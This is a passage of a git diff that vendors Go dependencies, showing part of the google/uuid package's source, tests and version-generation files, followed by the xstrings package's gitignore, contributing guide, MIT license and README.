+// Constants returned by Variant.
+const (
+	Invalid   = Variant(iota) // Invalid UUID
+	RFC4122                   // The variant specified in RFC4122
+	Reserved                  // Reserved, NCS backward compatibility.
+	Microsoft                 // Reserved, Microsoft Corporation backward compatibility.
+	Future                    // Reserved for future definition.
+)
+
+var rander = rand.Reader // random function
+
+// Parse decodes s into a UUID or returns an error.  Both the UUID form of
+// xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx and
+// urn:uuid:xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx are decoded.
+func Parse(s string) (UUID, error) {
+	var uuid UUID
+	if len(s) != 36 {
+		if len(s) != 36+9 {
+			return uuid, fmt.Errorf("invalid UUID length: %d", len(s))
+		}
+		if strings.ToLower(s[:9]) != "urn:uuid:" {
+			return uuid, fmt.Errorf("invalid urn prefix: %q", s[:9])
+		}
+		s = s[9:]
+	}
+	if s[8] != '-' || s[13] != '-' || s[18] != '-' || s[23] != '-' {
+		return uuid, errors.New("invalid UUID format")
+	}
+	for i, x := range [16]int{
+		0, 2, 4, 6,
+		9, 11,
+		14, 16,
+		19, 21,
+		24, 26, 28, 30, 32, 34} {
+		if v, ok := xtob(s[x], s[x+1]); !ok {
+			return uuid, errors.New("invalid UUID format")
+		} else {
+			uuid[i] = v
+		}
+	}
+	return uuid, nil
+}
+
+// ParseBytes is like Parse, except it parses a byte slice instead of a string.
+func ParseBytes(b []byte) (UUID, error) {
+	var uuid UUID
+	if len(b) != 36 {
+		if len(b) != 36+9 {
+			return uuid, fmt.Errorf("invalid UUID length: %d", len(b))
+		}
+		if !bytes.Equal(bytes.ToLower(b[:9]), []byte("urn:uuid:")) {
+			return uuid, fmt.Errorf("invalid urn prefix: %q", b[:9])
+		}
+		b = b[9:]
+	}
+	if b[8] != '-' || b[13] != '-' || b[18] != '-' || b[23] != '-' {
+		return uuid, errors.New("invalid UUID format")
+	}
+	for i, x := range [16]int{
+		0, 2, 4, 6,
+		9, 11,
+		14, 16,
+		19, 21,
+		24, 26, 28, 30, 32, 34} {
+		if v, ok := xtob(b[x], b[x+1]); !ok {
+			return uuid, errors.New("invalid UUID format")
+		} else {
+			uuid[i] = v
+		}
+	}
+	return uuid, nil
+}
+
+// Must returns uuid if err is nil and panics otherwise.
+func Must(uuid UUID, err error) UUID {
+	if err != nil {
+		panic(err)
+	}
+	return uuid
+}
+
+// String returns the string form of uuid, xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx
+// , or "" if uuid is invalid.
+func (uuid UUID) String() string {
+	var buf [36]byte
+	encodeHex(buf[:], uuid)
+	return string(buf[:])
+}
+
+// URN returns the RFC 2141 URN form of uuid,
+// urn:uuid:xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx,  or "" if uuid is invalid.
+func (uuid UUID) URN() string {
+	var buf [36 + 9]byte
+	copy(buf[:], "urn:uuid:")
+	encodeHex(buf[9:], uuid)
+	return string(buf[:])
+}
+
+func encodeHex(dst []byte, uuid UUID) {
+	hex.Encode(dst[:], uuid[:4])
+	dst[8] = '-'
+	hex.Encode(dst[9:13], uuid[4:6])
+	dst[13] = '-'
+	hex.Encode(dst[14:18], uuid[6:8])
+	dst[18] = '-'
+	hex.Encode(dst[19:23], uuid[8:10])
+	dst[23] = '-'
+	hex.Encode(dst[24:], uuid[10:])
+}
+
+// Variant returns the variant encoded in uuid.
+func (uuid UUID) Variant() Variant {
+	switch {
+	case (uuid[8] & 0xc0) == 0x80:
+		return RFC4122
+	case (uuid[8] & 0xe0) == 0xc0:
+		return Microsoft
+	case (uuid[8] & 0xe0) == 0xe0:
+		return Future
+	default:
+		return Reserved
+	}
+}
+
+// Version returns the version of uuid.
+func (uuid UUID) Version() Version {
+	return Version(uuid[6] >> 4)
+}
+
+func (v Version) String() string {
+	if v > 15 {
+		return fmt.Sprintf("BAD_VERSION_%d", v)
+	}
+	return fmt.Sprintf("VERSION_%d", v)
+}
+
+func (v Variant) String() string {
+	switch v {
+	case RFC4122:
+		return "RFC4122"
+	case Reserved:
+		return "Reserved"
+	case Microsoft:
+		return "Microsoft"
+	case Future:
+		return "Future"
+	case Invalid:
+		return "Invalid"
+	}
+	return fmt.Sprintf("BadVariant%d", int(v))
+}
+
+// SetRand sets the random number generator to r, which implents io.Reader.
+// If r.Read returns an error when the package requests random data then
+// a panic will be issued.
+//
+// Calling SetRand with nil sets the random number generator to the default
+// generator.
+func SetRand(r io.Reader) {
+	if r == nil {
+		rander = rand.Reader
+		return
+	}
+	rander = r
+}
diff --git a/vendor/github.com/google/uuid/uuid_test.go b/vendor/github.com/google/uuid/uuid_test.go
new file mode 100644
index 0000000000..70986ff3f3
--- /dev/null
+++ b/vendor/github.com/google/uuid/uuid_test.go
@@ -0,0 +1,526 @@
+// Copyright 2016 Google Inc.  All rights reserved.
+// Use of this source code is governed by a BSD-style
+// license that can be found in the LICENSE file.
+
+package uuid
+
+import (
+	"bytes"
+	"fmt"
+	"os"
+	"strings"
+	"testing"
+	"time"
+	"unsafe"
+)
+
+type test struct {
+	in      string
+	version Version
+	variant Variant
+	isuuid  bool
+}
+
+var tests = []test{
+	{"f47ac10b-58cc-0372-8567-0e02b2c3d479", 0, RFC4122, true},
+	{"f47ac10b-58cc-1372-8567-0e02b2c3d479", 1, RFC4122, true},
+	{"f47ac10b-58cc-2372-8567-0e02b2c3d479", 2, RFC4122, true},
+	{"f47ac10b-58cc-3372-8567-0e02b2c3d479", 3, RFC4122, true},
+	{"f47ac10b-58cc-4372-8567-0e02b2c3d479", 4, RFC4122, true},
+	{"f47ac10b-58cc-5372-8567-0e02b2c3d479", 5, RFC4122, true},
+	{"f47ac10b-58cc-6372-8567-0e02b2c3d479", 6, RFC4122, true},
+	{"f47ac10b-58cc-7372-8567-0e02b2c3d479", 7, RFC4122, true},
+	{"f47ac10b-58cc-8372-8567-0e02b2c3d479", 8, RFC4122, true},
+	{"f47ac10b-58cc-9372-8567-0e02b2c3d479", 9, RFC4122, true},
+	{"f47ac10b-58cc-a372-8567-0e02b2c3d479", 10, RFC4122, true},
+	{"f47ac10b-58cc-b372-8567-0e02b2c3d479", 11, RFC4122, true},
+	{"f47ac10b-58cc-c372-8567-0e02b2c3d479", 12, RFC4122, true},
+	{"f47ac10b-58cc-d372-8567-0e02b2c3d479", 13, RFC4122, true},
+	{"f47ac10b-58cc-e372-8567-0e02b2c3d479", 14, RFC4122, true},
+	{"f47ac10b-58cc-f372-8567-0e02b2c3d479", 15, RFC4122, true},
+
+	{"urn:uuid:f47ac10b-58cc-4372-0567-0e02b2c3d479", 4, Reserved, true},
+	{"URN:UUID:f47ac10b-58cc-4372-0567-0e02b2c3d479", 4, Reserved, true},
+	{"f47ac10b-58cc-4372-0567-0e02b2c3d479", 4, Reserved, true},
+	{"f47ac10b-58cc-4372-1567-0e02b2c3d479", 4, Reserved, true},
+	{"f47ac10b-58cc-4372-2567-0e02b2c3d479", 4, Reserved, true},
+	{"f47ac10b-58cc-4372-3567-0e02b2c3d479", 4, Reserved, true},
+	{"f47ac10b-58cc-4372-4567-0e02b2c3d479", 4, Reserved, true},
+	{"f47ac10b-58cc-4372-5567-0e02b2c3d479", 4, Reserved, true},
+	{"f47ac10b-58cc-4372-6567-0e02b2c3d479", 4, Reserved, true},
+	{"f47ac10b-58cc-4372-7567-0e02b2c3d479", 4, Reserved, true},
+	{"f47ac10b-58cc-4372-8567-0e02b2c3d479", 4, RFC4122, true},
+	{"f47ac10b-58cc-4372-9567-0e02b2c3d479", 4, RFC4122, true},
+	{"f47ac10b-58cc-4372-a567-0e02b2c3d479", 4, RFC4122, true},
+	{"f47ac10b-58cc-4372-b567-0e02b2c3d479", 4, RFC4122, true},
+	{"f47ac10b-58cc-4372-c567-0e02b2c3d479", 4, Microsoft, true},
+	{"f47ac10b-58cc-4372-d567-0e02b2c3d479", 4, Microsoft, true},
+	{"f47ac10b-58cc-4372-e567-0e02b2c3d479", 4, Future, true},
+	{"f47ac10b-58cc-4372-f567-0e02b2c3d479", 4, Future, true},
+
+	{"f47ac10b158cc-5372-a567-0e02b2c3d479", 0, Invalid, false},
+	{"f47ac10b-58cc25372-a567-0e02b2c3d479", 0, Invalid, false},
+	{"f47ac10b-58cc-53723a567-0e02b2c3d479", 0, Invalid, false},
+	{"f47ac10b-58cc-5372-a56740e02b2c3d479", 0, Invalid, false},
+	{"f47ac10b-58cc-5372-a567-0e02-2c3d479", 0, Invalid, false},
+	{"g47ac10b-58cc-4372-a567-0e02b2c3d479", 0, Invalid, false},
+}
+
+var constants = []struct {
+	c    interface{}
+	name string
+}{
+	{Person, "Person"},
+	{Group, "Group"},
+	{Org, "Org"},
+	{Invalid, "Invalid"},
+	{RFC4122, "RFC4122"},
+	{Reserved, "Reserved"},
+	{Microsoft, "Microsoft"},
+	{Future, "Future"},
+	{Domain(17), "Domain17"},
+	{Variant(42), "BadVariant42"},
+}
+
+func testTest(t *testing.T, in string, tt test) {
+	uuid, err := Parse(in)
+	if ok := (err == nil); ok != tt.isuuid {
+		t.Errorf("Parse(%s) got %v expected %v\b", in, ok, tt.isuuid)
+	}
+	if err != nil {
+		return
+	}
+
+	if v := uuid.Variant(); v != tt.variant {
+		t.Errorf("Variant(%s) got %d expected %d\b", in, v, tt.variant)
+	}
+	if v := uuid.Version(); v != tt.version {
+		t.Errorf("Version(%s) got %d expected %d\b", in, v, tt.version)
+	}
+}
+
+func testBytes(t *testing.T, in []byte, tt test) {
+	uuid, err := ParseBytes(in)
+	if ok := (err == nil); ok != tt.isuuid {
+		t.Errorf("ParseBytes(%s) got %v expected %v\b", in, ok, tt.isuuid)
+	}
+	if err != nil {
+		return
+	}
+	suuid, _ := Parse(string(in))
+	if uuid != suuid {
+		t.Errorf("ParseBytes(%s) got %v expected %v\b", in, uuid, suuid)
+	}
+}
+
+func TestUUID(t *testing.T) {
+	for _, tt := range tests {
+		testTest(t, tt.in, tt)
+		testTest(t, strings.ToUpper(tt.in), tt)
+		testBytes(t, []byte(tt.in), tt)
+	}
+}
+
+func TestConstants(t *testing.T) {
+	for x, tt := range constants {
+		v, ok := tt.c.(fmt.Stringer)
+		if !ok {
+			t.Errorf("%x: %v: not a stringer", x, v)
+		} else if s := v.String(); s != tt.name {
+			v, _ := tt.c.(int)
+			t.Errorf("%x: Constant %T:%d gives %q, expected %q", x, tt.c, v, s, tt.name)
+		}
+	}
+}
+
+func TestRandomUUID(t *testing.T) {
+	m := make(map[string]bool)
+	for x := 1; x < 32; x++ {
+		uuid := New()
+		s := uuid.String()
+		if m[s] {
+			t.Errorf("NewRandom returned duplicated UUID %s", s)
+		}
+		m[s] = true
+		if v := uuid.Version(); v != 4 {
+			t.Errorf("Random UUID of version %s", v)
+		}
+		if uuid.Variant() != RFC4122 {
+			t.Errorf("Random UUID is variant %d", uuid.Variant())
+		}
+	}
+}
+
+func TestNew(t *testing.T) {
+	m := make(map[UUID]bool)
+	for x := 1; x < 32; x++ {
+		s := New()
+		if m[s] {
+			t.Errorf("New returned duplicated UUID %s", s)
+		}
+		m[s] = true
+		uuid, err := Parse(s.String())
+		if err != nil {
+			t.Errorf("New.String() returned %q which does not decode", s)
+			continue
+		}
+		if v := uuid.Version(); v != 4 {
+			t.Errorf("Random UUID of version %s", v)
+		}
+		if uuid.Variant() != RFC4122 {
+			t.Errorf("Random UUID is variant %d", uuid.Variant())
+		}
+	}
+}
+
+func TestClockSeq(t *testing.T) {
+	// Fake time.Now for this test to return a monotonically advancing time; restore it at end.
+	defer func(orig func() time.Time) { timeNow = orig }(timeNow)
+	monTime := time.Now()
+	timeNow = func() time.Time {
+		monTime = monTime.Add(1 * time.Second)
+		return monTime
+	}
+
+	SetClockSequence(-1)
+	uuid1, err := NewUUID()
+	if err != nil {
+		t.Fatalf("could not create UUID: %v", err)
+	}
+	uuid2, err := NewUUID()
+	if err != nil {
+		t.Fatalf("could not create UUID: %v", err)
+	}
+
+	if s1, s2 := uuid1.ClockSequence(), uuid2.ClockSequence(); s1 != s2 {
+		t.Errorf("clock sequence %d != %d", s1, s2)
+	}
+
+	SetClockSequence(-1)
+	uuid2, err = NewUUID()
+	if err != nil {
+		t.Fatalf("could not create UUID: %v", err)
+	}
+
+	// Just on the very off chance we generated the same sequence
+	// two times we try again.
+	if uuid1.ClockSequence() == uuid2.ClockSequence() {
+		SetClockSequence(-1)
+		uuid2, err = NewUUID()
+		if err != nil {
+			t.Fatalf("could not create UUID: %v", err)
+		}
+	}
+	if s1, s2 := uuid1.ClockSequence(), uuid2.ClockSequence(); s1 == s2 {
+		t.Errorf("Duplicate clock sequence %d", s1)
+	}
+
+	SetClockSequence(0x1234)
+	uuid1, err = NewUUID()
+	if err != nil {
+		t.Fatalf("could not create UUID: %v", err)
+	}
+	if seq := uuid1.ClockSequence(); seq != 0x1234 {
+		t.Errorf("%s: expected seq 0x1234 got 0x%04x", uuid1, seq)
+	}
+}
+
+func TestCoding(t *testing.T) {
+	text := "7d444840-9dc0-11d1-b245-5ffdce74fad2"
+	urn := "urn:uuid:7d444840-9dc0-11d1-b245-5ffdce74fad2"
+	data := UUID{
+		0x7d, 0x44, 0x48, 0x40,
+		0x9d, 0xc0,
+		0x11, 0xd1,
+		0xb2, 0x45,
+		0x5f, 0xfd, 0xce, 0x74, 0xfa, 0xd2,
+	}
+	if v := data.String(); v != text {
+		t.Errorf("%x: encoded to %s, expected %s", data, v, text)
+	}
+	if v := data.URN(); v != urn {
+		t.Errorf("%x: urn is %s, expected %s", data, v, urn)
+	}
+
+	uuid, err := Parse(text)
+	if err != nil {
+		t.Errorf("Parse returned unexpected error %v", err)
+	}
+	if data != data {
+		t.Errorf("%s: decoded to %s, expected %s", text, uuid, data)
+	}
+}
+
+func TestVersion1(t *testing.T) {
+	uuid1, err := NewUUID()
+	if err != nil {
+		t.Fatalf("could not create UUID: %v", err)
+	}
+	uuid2, err := NewUUID()
+	if err != nil {
+		t.Fatalf("could not create UUID: %v", err)
+	}
+
+	if uuid1 == uuid2 {
+		t.Errorf("%s:duplicate uuid", uuid1)
+	}
+	if v := uuid1.Version(); v != 1 {
+		t.Errorf("%s: version %s expected 1", uuid1, v)
+	}
+	if v := uuid2.Version(); v != 1 {
+		t.Errorf("%s: version %s expected 1", uuid2, v)
+	}
+	n1 := uuid1.NodeID()
+	n2 := uuid2.NodeID()
+	if !bytes.Equal(n1, n2) {
+		t.Errorf("Different nodes %x != %x", n1, n2)
+	}
+	t1 := uuid1.Time()
+	t2 := uuid2.Time()
+	q1 := uuid1.ClockSequence()
+	q2 := uuid2.ClockSequence()
+
+	switch {
+	case t1 == t2 && q1 == q2:
+		t.Error("time stopped")
+	case t1 > t2 && q1 == q2:
+		t.Error("time reversed")
+	case t1 < t2 && q1 != q2:
+		t.Error("clock sequence chaned unexpectedly")
+	}
+}
+
+func TestNode(t *testing.T) {
+	// This test is mostly to make sure we don't leave nodeMu locked.
+	ifname = ""
+	if ni := NodeInterface(); ni != "" {
+		t.Errorf("NodeInterface got %q, want %q", ni, "")
+	}
+	if SetNodeInterface("xyzzy") {
+		t.Error("SetNodeInterface succeeded on a bad interface name")
+	}
+	if !SetNodeInterface("") {
+		t.Error("SetNodeInterface failed")
+	}
+	if ni := NodeInterface(); ni == "" {
+		t.Error("NodeInterface returned an empty string")
+	}
+
+	ni := NodeID()
+	if len(ni) != 6 {
+		t.Errorf("ni got %d bytes, want 6", len(ni))
+	}
+	hasData := false
+	for _, b := range ni {
+		if b != 0 {
+			hasData = true
+		}
+	}
+	if !hasData {
+		t.Error("nodeid is all zeros")
+	}
+
+	id := []byte{1, 2, 3, 4, 5, 6, 7, 8}
+	SetNodeID(id)
+	ni = NodeID()
+	if !bytes.Equal(ni, id[:6]) {
+		t.Errorf("got nodeid %v, want %v", ni, id[:6])
+	}
+
+	if ni := NodeInterface(); ni != "user" {
+		t.Errorf("got inteface %q, want %q", ni, "user")
+	}
+}
+
+func TestNodeAndTime(t *testing.T) {
+	// Time is February 5, 1998 12:30:23.136364800 AM GMT
+
+	uuid, err := Parse("7d444840-9dc0-11d1-b245-5ffdce74fad2")
+	if err != nil {
+		t.Fatalf("Parser returned unexpected error %v", err)
+	}
+	node := []byte{0x5f, 0xfd, 0xce, 0x74, 0xfa, 0xd2}
+
+	ts := uuid.Time()
+	c := time.Unix(ts.UnixTime())
+	want := time.Date(1998, 2, 5, 0, 30, 23, 136364800, time.UTC)
+	if !c.Equal(want) {
+		t.Errorf("Got time %v, want %v", c, want)
+	}
+	if !bytes.Equal(node, uuid.NodeID()) {
+		t.Errorf("Expected node %v got %v", node, uuid.NodeID())
+	}
+}
+
+func TestMD5(t *testing.T) {
+	uuid := NewMD5(NameSpaceDNS, []byte("python.org")).String()
+	want := "6fa459ea-ee8a-3ca4-894e-db77e160355e"
+	if uuid != want {
+		t.Errorf("MD5: got %q expected %q", uuid, want)
+	}
+}
+
+func TestSHA1(t *testing.T) {
+	uuid := NewSHA1(NameSpaceDNS, []byte("python.org")).String()
+	want := "886313e1-3b8a-5372-9b90-0c9aee199e5d"
+	if uuid != want {
+		t.Errorf("SHA1: got %q expected %q", uuid, want)
+	}
+}
+
+func TestNodeID(t *testing.T) {
+	nid := []byte{1, 2, 3, 4, 5, 6}
+	SetNodeInterface("")
+	s := NodeInterface()
+	if s == "" || s == "user" {
+		t.Errorf("NodeInterface %q after SetInteface", s)
+	}
+	node1 := NodeID()
+	if node1 == nil {
+		t.Error("NodeID nil after SetNodeInterface", s)
+	}
+	SetNodeID(nid)
+	s = NodeInterface()
+	if s != "user" {
+		t.Errorf("Expected NodeInterface %q got %q", "user", s)
+	}
+	node2 := NodeID()
+	if node2 == nil {
+		t.Error("NodeID nil after SetNodeID", s)
+	}
+	if bytes.Equal(node1, node2) {
+		t.Error("NodeID not changed after SetNodeID", s)
+	} else if !bytes.Equal(nid, node2) {
+		t.Errorf("NodeID is %x, expected %x", node2, nid)
+	}
+}
+
+func testDCE(t *testing.T, name string, uuid UUID, err error, domain Domain, id uint32) {
+	if err != nil {
+		t.Errorf("%s failed: %v", name, err)
+		return
+	}
+	if v := uuid.Version(); v != 2 {
+		t.Errorf("%s: %s: expected version 2, got %s", name, uuid, v)
+		return
+	}
+	if v := uuid.Domain(); v != domain {
+		t.Errorf("%s: %s: expected domain %d, got %d", name, uuid, domain, v)
+	}
+	if v := uuid.ID(); v != id {
+		t.Errorf("%s: %s: expected id %d, got %d", name, uuid, id, v)
+	}
+}
+
+func TestDCE(t *testing.T) {
+	uuid, err := NewDCESecurity(42, 12345678)
+	testDCE(t, "NewDCESecurity", uuid, err, 42, 12345678)
+	uuid, err = NewDCEPerson()
+	testDCE(t, "NewDCEPerson", uuid, err, Person, uint32(os.Getuid()))
+	uuid, err = NewDCEGroup()
+	testDCE(t, "NewDCEGroup", uuid, err, Group, uint32(os.Getgid()))
+}
+
+type badRand struct{}
+
+func (r badRand) Read(buf []byte) (int, error) {
+	for i, _ := range buf {
+		buf[i] = byte(i)
+	}
+	return len(buf), nil
+}
+
+func TestBadRand(t *testing.T) {
+	SetRand(badRand{})
+	uuid1 := New()
+	uuid2 := New()
+	if uuid1 != uuid2 {
+		t.Errorf("execpted duplicates, got %q and %q", uuid1, uuid2)
+	}
+	SetRand(nil)
+	uuid1 = New()
+	uuid2 = New()
+	if uuid1 == uuid2 {
+		t.Errorf("unexecpted duplicates, got %q", uuid1)
+	}
+}
+
+var asString = "f47ac10b-58cc-0372-8567-0e02b2c3d479"
+var asBytes = []byte(asString)
+
+func BenchmarkParse(b *testing.B) {
+	for i := 0; i < b.N; i++ {
+		_, err := Parse(asString)
+		if err != nil {
+			b.Fatal(err)
+		}
+	}
+}
+
+func BenchmarkParseBytes(b *testing.B) {
+	for i := 0; i < b.N; i++ {
+		_, err := ParseBytes(asBytes)
+		if err != nil {
+			b.Fatal(err)
+		}
+	}
+}
+
+// parseBytesUnsafe is to benchmark using unsafe.
+func parseBytesUnsafe(b []byte) (UUID, error) {
+	return Parse(*(*string)(unsafe.Pointer(&b)))
+}
+
+
+func BenchmarkParseBytesUnsafe(b *testing.B) {
+	for i := 0; i < b.N; i++ {
+		_, err := parseBytesUnsafe(asBytes)
+		if err != nil {
+			b.Fatal(err)
+		}
+	}
+}
+
+// parseBytesCopy is to benchmark not using unsafe.
+func parseBytesCopy(b []byte) (UUID, error) {
+	return Parse(string(b))
+}
+
+func BenchmarkParseBytesCopy(b *testing.B) {
+	for i := 0; i < b.N; i++ {
+		_, err := parseBytesCopy(asBytes)
+		if err != nil {
+			b.Fatal(err)
+		}
+	}
+}
+
+func BenchmarkNew(b *testing.B) {
+	for i := 0; i < b.N; i++ {
+		New()
+	}
+}
+
+func BenchmarkUUID_String(b *testing.B) {
+	uuid, err := Parse("f47ac10b-58cc-0372-8567-0e02b2c3d479")
+	if err != nil {
+		b.Fatal(err)
+	}
+	for i := 0; i < b.N; i++ {
+		if uuid.String() == "" {
+			b.Fatal("invalid uuid")
+		}
+	}
+}
+
+func BenchmarkUUID_URN(b *testing.B) {
+	uuid, err := Parse("f47ac10b-58cc-0372-8567-0e02b2c3d479")
+	if err != nil {
+		b.Fatal(err)
+	}
+	for i := 0; i < b.N; i++ {
+		if uuid.URN() == "" {
+			b.Fatal("invalid uuid")
+		}
+	}
+}
diff --git a/vendor/github.com/google/uuid/version1.go b/vendor/github.com/google/uuid/version1.go
new file mode 100644
index 0000000000..22dc07cdce
--- /dev/null
+++ b/vendor/github.com/google/uuid/version1.go
@@ -0,0 +1,44 @@
+// Copyright 2016 Google Inc.  All rights reserved.
+// Use of this source code is governed by a BSD-style
+// license that can be found in the LICENSE file.
+
+package uuid
+
+import (
+	"encoding/binary"
+)
+
+// NewUUID returns a Version 1 UUID based on the current NodeID and clock
+// sequence, and the current time.  If the NodeID has not been set by SetNodeID
+// or SetNodeInterface then it will be set automatically.  If the NodeID cannot
+// be set NewUUID returns nil.  If clock sequence has not been set by
+// SetClockSequence then it will be set automatically.  If GetTime fails to
+// return the current NewUUID returns Nil and an error.
+//
+// In most cases, New should be used.
+func NewUUID() (UUID, error) {
+	nodeMu.Lock()
+	if nodeID == zeroID {
+		setNodeInterface("")
+	}
+	nodeMu.Unlock()
+
+	var uuid UUID
+	now, seq, err := GetTime()
+	if err != nil {
+		return uuid, err
+	}
+
+	timeLow := uint32(now & 0xffffffff)
+	timeMid := uint16((now >> 32) & 0xffff)
+	timeHi := uint16((now >> 48) & 0x0fff)
+	timeHi |= 0x1000 // Version 1
+
+	binary.BigEndian.PutUint32(uuid[0:], timeLow)
+	binary.BigEndian.PutUint16(uuid[4:], timeMid)
+	binary.BigEndian.PutUint16(uuid[6:], timeHi)
+	binary.BigEndian.PutUint16(uuid[8:], seq)
+	copy(uuid[10:], nodeID[:])
+
+	return uuid, nil
+}
diff --git a/vendor/github.com/google/uuid/version4.go b/vendor/github.com/google/uuid/version4.go
new file mode 100644
index 0000000000..390dd2cad4
--- /dev/null
+++ b/vendor/github.com/google/uuid/version4.go
@@ -0,0 +1,38 @@
+// Copyright 2016 Google Inc.  All rights reserved.
+// Use of this source code is governed by a BSD-style
+// license that can be found in the LICENSE file.
+
+package uuid
+
+import "io"
+
+// New is creates a new random UUID or panics.  New is equivalent to
+// the expression
+//
+//    uuid.Must(uuid.NewRandom())
+func New() UUID {
+	return Must(NewRandom())
+}
+
+// NewRandom returns a Random (Version 4) UUID or panics.
+//
+// The strength of the UUIDs is based on the strength of the crypto/rand
+// package.
+//
+// A note about uniqueness derived from from the UUID Wikipedia entry:
+//
+//  Randomly generated UUIDs have 122 random bits.  One's annual risk of being
+//  hit by a meteorite is estimated to be one chance in 17 billion, that
+//  means the probability is about 0.00000000006 (6 × 10−11),
+//  equivalent to the odds of creating a few tens of trillions of UUIDs in a
+//  year and having one duplicate.
+func NewRandom() (UUID, error) {
+	var uuid UUID
+	_, err := io.ReadFull(rander, uuid[:])
+	if err != nil {
+		return Nil, err
+	}
+	uuid[6] = (uuid[6] & 0x0f) | 0x40 // Version 4
+	uuid[8] = (uuid[8] & 0x3f) | 0x80 // Variant is 10
+	return uuid, nil
+}
diff --git a/vendor/github.com/huandu/xstrings/.gitignore b/vendor/github.com/huandu/xstrings/.gitignore
new file mode 100644
index 0000000000..daf913b1b3
--- /dev/null
+++ b/vendor/github.com/huandu/xstrings/.gitignore
@@ -0,0 +1,24 @@
+# Compiled Object files, Static and Dynamic libs (Shared Objects)
+*.o
+*.a
+*.so
+
+# Folders
+_obj
+_test
+
+# Architecture specific extensions/prefixes
+*.[568vq]
+[568vq].out
+
+*.cgo1.go
+*.cgo2.c
+_cgo_defun.c
+_cgo_gotypes.go
+_cgo_export.*
+
+_testmain.go
+
+*.exe
+*.test
+*.prof
diff --git a/vendor/github.com/huandu/xstrings/.travis.yml b/vendor/github.com/huandu/xstrings/.travis.yml
new file mode 100644
index 0000000000..4f2ee4d973
--- /dev/null
+++ b/vendor/github.com/huandu/xstrings/.travis.yml
@@ -0,0 +1 @@
+language: go
diff --git a/vendor/github.com/huandu/xstrings/CONTRIBUTING.md b/vendor/github.com/huandu/xstrings/CONTRIBUTING.md
new file mode 100644
index 0000000000..d7b4b8d584
--- /dev/null
+++ b/vendor/github.com/huandu/xstrings/CONTRIBUTING.md
@@ -0,0 +1,23 @@
+# Contributing #
+
+Thanks for your contribution in advance. No matter what you will contribute to this project, pull request or bug report or feature discussion, it's always highly appreciated.
+
+## New API or feature ##
+
+I want to speak more about how to add new functions to this package.
+
+Package `xstring` is a collection of useful string functions which should be implemented in Go. It's a bit subject to say which function should be included and which should not. I set up following rules in order to make it clear and as objective as possible.
+
+* Rule 1: Only string algorithm, which takes string as input, can be included.
+* Rule 2: If a function has been implemented in package `string`, it must not be included.
+* Rule 3: If a function is not language neutral, it must not be included.
+* Rule 4: If a function is a part of standard library in other languages, it can be included.
+* Rule 5: If a function is quite useful in some famous framework or library, it can be included.
+
+New function must be discussed in project issues before submitting any code. If a pull request with new functions is sent without any ref issue, it will be rejected.
+
+## Pull request ##
+
+Pull request is always welcome. Just make sure you have run `go fmt` and all test cases passed before submit.
+
+If the pull request is to add a new API or feature, don't forget to update README.md and add new API in function list.
diff --git a/vendor/github.com/huandu/xstrings/LICENSE b/vendor/github.com/huandu/xstrings/LICENSE
new file mode 100644
index 0000000000..2701772593
--- /dev/null
+++ b/vendor/github.com/huandu/xstrings/LICENSE
@@ -0,0 +1,22 @@
+The MIT License (MIT)
+
+Copyright (c) 2015 Huan Du
+
+Permission is hereby granted, free of charge, to any person obtaining a copy
+of this software and associated documentation files (the "Software"), to deal
+in the Software without restriction, including without limitation the rights
+to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+copies of the Software, and to permit persons to whom the Software is
+furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all
+copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+SOFTWARE.
+
diff --git a/vendor/github.com/huandu/xstrings/README.md b/vendor/github.com/huandu/xstrings/README.md
new file mode 100644
index 0000000000..c824a5c3f2
--- /dev/null
+++ b/vendor/github.com/huandu/xstrings/README.md
@@ -0,0 +1,114 @@
+# xstrings #
+
+[![Build Status](https://travis-ci.org/huandu/xstrings.svg?branch=master)](https://travis-ci.org/huandu/xstrings)
+[![GoDoc](https://godoc.org/github.com/huandu/xstrings?status.svg)](https://godoc.org/github.com/huandu/xstrings)
+
+Go package [xstrings](https://godoc.org/github.com/huandu/xstrings) is a collection of string functions, which are widely used in other languages but absent in Go package [strings](http://golang.org/pkg/strings).
+
+All functions are well tested and carefully tuned for performance.
+
+## Propose a new function ##
+
+Please review [contributing guideline](CONTRIBUTING.md) and [create new issue](https://github.com/huandu/xstrings/issues) to state why it should be included.
+
+## Install ##
+
+Use `go get` to install this library.
+
+	go get github.com/huandu/xstrings
+
+## API document ##
+
+See [GoDoc](https://godoc.org/github.com/huandu/xstrings) for full document.
+
+## Function list ##
+
+Go functions have a unique naming style. One, who has experience in other language but new in Go, may have difficulties to find out right string function to use.
+
+Here is a list of functions in [strings](http://golang.org/pkg/strings) and [xstrings](https://godoc.org/github.com/huandu/xstrings) with enough extra information about how to map these functions to their friends in other languages. Hope this list could be helpful for fresh gophers.
+
+### Package `xstrings` functions ###
+
+*Keep this table sorted by Function in ascending order.*
+
+| Function | Friends | # |
+| -------- | ------- | --- |
+| [Center](https://godoc.org/github.com/huandu/xstrings#Center) | `str.center` in Python; `String#center` in Ruby | [#30](https://github.com/huandu/xstrings/issues/30) |
+| [Count](https://godoc.org/github.com/huandu/xstrings#Count) | `String#count` in Ruby | [#16](https://github.com/huandu/xstrings/issues/16) |
+| [Delete](https://godoc.org/github.com/huandu/xstrings#Delete) | `String#delete` in Ruby | [#17](https://github.com/huandu/xstrings/issues/17) |
+| [ExpandTabs](https://godoc.org/github.com/huandu/xstrings#ExpandTabs) | `str.expandtabs` in Python | [#27](https://github.com/huandu/xstrings/issues/27) |
+| [FirstRuneToLower](https://godoc.org/github.com/huandu/xstrings#FirstRuneToLower) | `lcfirst` in PHP or Perl | [#15](https://github.com/huandu/xstrings/issues/15) |
